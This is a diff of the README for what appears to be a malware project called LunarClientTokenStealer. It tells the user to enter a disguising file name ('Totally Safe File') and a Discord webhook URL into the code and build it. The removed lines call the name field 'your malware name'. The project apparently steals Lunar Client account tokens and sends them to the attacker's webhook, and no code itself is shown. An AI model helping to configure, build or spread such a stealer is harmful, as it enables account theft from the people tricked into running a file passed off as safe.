tsukilo/LunarClientTokenStealer/README.md

 # LunarClientTokenStealer

-Fill in your application name and discord webhook URL for example:
+Fill in your application name and discord webhook URL in the code and build

-// Put your malware name here
+for example:

 String name = "Totally Safe File";
-// Put your webhook URL here
 String webhook = "https://discord.gg/webhook/url/here";